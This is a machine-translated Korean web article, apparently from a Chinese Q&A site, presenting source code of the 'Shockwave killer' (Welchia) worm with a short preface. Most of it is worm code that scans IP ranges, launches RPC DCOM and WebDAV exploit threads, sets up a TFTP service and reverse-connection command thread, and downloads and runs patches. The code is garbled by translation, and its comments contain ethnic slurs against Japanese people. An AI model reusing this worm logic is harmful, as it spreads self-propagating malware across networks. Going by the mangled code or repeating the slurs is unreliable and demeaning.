충격파 킬러 해커는 누구입니까?

이 문제 경찰도 < P > 가 문장 한 편을 인터넷에 올리지 않았다는 사실을 알고 싶어 한다. < P > 충격파 킬러의 저자 인터넷에 < P > 서문:' 충격파' 웜이 터진 후 많은 개인 호스트와 서버가 습격을 당했고, 각 주요 보안회사, 백신 업체들이 각종 해결책을 내놓고 있다. 놀랍게도, 이 벌레의 작업 목표는 충격파 웜을 없애고 피해 호스트를 자동으로 패치하는 것이었고, 이 웜은 시한부 자멸 기능도 갖추고 있었다. 저자의 목표에는 선의의 요소가 있었음이 분명하다. 하지만 웜은 웜이었다. 대량의 icmp 패킷이 전송되기 때문에 기업 LAN 에 엄청난 압력을 가할 수 있기 때문에 웜의 위험성은 여전히 큰 관심과 경각심을 유지해야 한다. 문장 참고할 수 있다. //바로 이것 때문에 ~~

else if (unOemCP == 95 & & WMain == 4 & & WSub == 1) //tw

nLanguageID = 2; //동포골육의 부탁 ~~

else if (unOemCP == 932 & & WMain == x11 & & WSub == 1) //jp

nLanguageID = -1; //간혹 왜놈 기계를 죽이려는 충동이 있다!

// 그냥, 억울한 신고는 언제였는가 ~ ~ ~ ~ 그의 새

~~~ 다시 불장난을 하면 그의 계집애가 꺼지길 바란다 ~~

else if (unOemCP == 949 & & WMain == x12 & & WSub == 1) //kr

nLanguageID = 3; //덜 철없는 작은 새가 휘어져 국내에 해를 끼친다 ~~

else{

nLanguageID = -1;

}

if (nlanguageid = =-1)

복귀 false;

charsz 서비스 팩 [] = "RPC 서비스 팩.exe";

//downlaodit ~ ~ ~ ~

if (! NSystemVer) {// 2k

if (! Download spfile (SZ 서비스 팩, SZ win 2k spurl [nlanguageid])

return false;

}

else{

if (! Download spfile (SZ 서비스 팩, szwinxpspurl [nlanguageid])

return false;

}

char szExec[18];

스프린트 (szexec, "%s-n-o-z-q", SZ 서비스 팩);

handlehprocess = makeprocess (szexec);

if (hprocess = = null)

return false;

if (waitforsingleobject (hprocess, 36)! = WAIT_OBJECT_ ){ // 6 분 이내에

완료되지 않음

TerminateProcess(hProcess,1);

CloseHandle(hProcess);

delete file (SZ 서비스 팩) ：

return FALSE;

}

CloseHandle(hProcess);

Sleep(15);

delete file (SZ 서비스 팩) ：

if (readregservicepack (nsystemver)) {

shutdown windows (ewx _ reboot | ewx _ force) //install 서비스 팩 ok, reboot

it ~ ~ ~

sleep (2); //가끔 재부팅한 적이 있다고? 재부팅 안 함 패치가 잘못되었습니다.

빌을 찾아 ~~~

}

return TRUE;

}

// IN: 시작 ip, B 세그먼트 수, 무작위인지 여부, WebDav // 더 나쁘게 바꿀지 여부 ~ ~ ~ ~ 아쉬운 대로 ~ ~ ~

void beginexploitff 를 본다

BOOL bFirst = TRUE;

u_long uComp; 용

(int I = ; I< (nBCount * 256 * 256); I++) {

if (brand)

ucomp = makerandip ();

else

uComp = I+ulIpStart;

if (// 또는 목표의 일부를 차단하여 목표가 모집된 후 다시 놀면 다음 세대를 해치고 파괴하지 않는 좋은

~ ~ ~

(byte) ucomp = = xc5 | | < > 8) == xc5 ||

(BYTE)(uComp> > 16) == xc5 ||

(BYTE)(uComp> > 24) = = xc5 | |

(word) ucomp = = x9999 | |

(word) (ucomp > > 8) == x9999 ||

(WORD)(uComp> > 16) == x9999)

continue;

u_long *myPara = new u_long;

if (myPara == NULL ){// 할당이 실패할 경우

Sleep(1) 를 다시 시도합니다.

myPara = new u_long;

}

if (mypara) {

if (hthread)

closehandle (hthread);

*myPara = htonl( uComp);

DWORD dwThreadId;

if (b webdav)

hthread =

createthread (null, , exploitwebdavthread, (lpvoid) DwThreadId);

else

hthread =

createthread (null, , exploitrpcdcomthread, (lpvoid) mypara,, DwThreadId);

Sleep(2);

}

// 처음 실행할 때 스레드의

InterlockedIncrement(&) 를 피하기 위해 여기에 코드를 추가합니다 G_CurThreadCount) 미처 실행하지 못하고 n 개 스레드의

bug!

if (bFirst & & (I > = nMaxThread) ){

Sleep(2);

bFirst = FALSE;

}

while (g _ curthread count > = nmax thread)//# define nmax thread 3, 조심하지 않아

가 ~~~

Sleep(2);

}

Sleep(6);

}

// 서비스 모드 및 콘솔 모드 유틸리티 주 프로그램

void DoIt()

{

WSADATAwsd;

if (wsa startup (make word (2, 2), & Wsd)! = )

복귀;

// 웜 죽이기

KillMsblast ();

SYSTEMTIME ST 제거 ：

GetLocalTime(& St);

if (st.wyear = = 24) {

mydeleteservice (SZ 서비스 이름);

mydeleteservice (szservicetftpd);

RemoveMe ();

ExitProcess(1) ： //사실 필요 없습니다. RemoveMe () 에서 선배의 코드를 빌렸습니다. 2k 에서 프로그램을 종료할 때

자체 파일을

}

srand( GetTickCount ());

memset (pping buffer,' \ xaa', sizeof (pping buffer));

// 백본 라우터가이 기능 Icmp Echo 패키지를 즉시 버리십시오! 국내의 어떤 파동이 이미 절절절되었다! ~ ~ 보충

딩은 이미 충분히 쳤다! ~ ~ ~ ~

/WebDav 전송 버퍼 준비

do {

pwebdavexploitbuffer = newchar [68];

Sleep(1);

} while (pwebdavexploitbuffer = = null);

// checkonlien 앞에 총알 한 번에 조립해야 함

PressWebDavBufferOnce ();

PressRpcDcomBufferOnce ();

CheckOnlienAndPressData (); //get LocalIp & 총알의 역방향 IP 및 포트 수정

// 패치

DoServicePackFunction ();

// 수신 스레드 설정

DWORD dwThreadID;

handle

hworkthread = createthread (null, , (lpthread _ start _ routine) recvsendcmdtts DwThreadID);

if (hworkthread = = null)//recvsendcmdthread 에서 차단, 역연결, 재구축 스레드 처리,

여러 역연결 동시 처리

return;

CloseHandle(hWorkThread);

if (! Mystar tservice (szservicetftpd)) {

sleep (1);

InstallTftpService ();

Sleep(1);

mystar tservice (szservicetftpd);

}

Sleep(2); //수신 스레드에서 글로벌 rand bind port 대기

u _ long ulip;

for (; {//추정, 일반 기계 2 시간 1 사이클

// 먼저 본 IP 세그먼트

CheckOnlienAndPressData ();

ulip = ntohl (inet _ addr (SZ localip));

ulIP & = xffff;

beginexploitfunction (ulip, 1,,);

// 본 IP 앞뒤 3 개 세그먼트 다시 스캔

CheckOnlienAndPressData ();

if (rand ()% 2)

ulip+= x1;

else

ulIP -= x3;

beginexploitfunction (ulip, 3,,);

// WebDav 섹션을 다시 검색하고 135 syn 차단

CheckOnlienAndPressData ();

ulip = makelong (, wdiphead [rand ()% 76]); //wdIPhead [] 섹션 b IP 업체에 주의 ~~~,

즉시 시정 조치 ~ ~ ~ sorry ~ ~ ~

beginexploitfunction 을 요청하십시오

上篇: 왜 나를 포함한 QQ 아바타는 모두 텐센트 인형인가요! 下篇: 차이나 텔레콤 스카이 윙 HG523 라우터는 포트 매핑을 어떻게 합니까?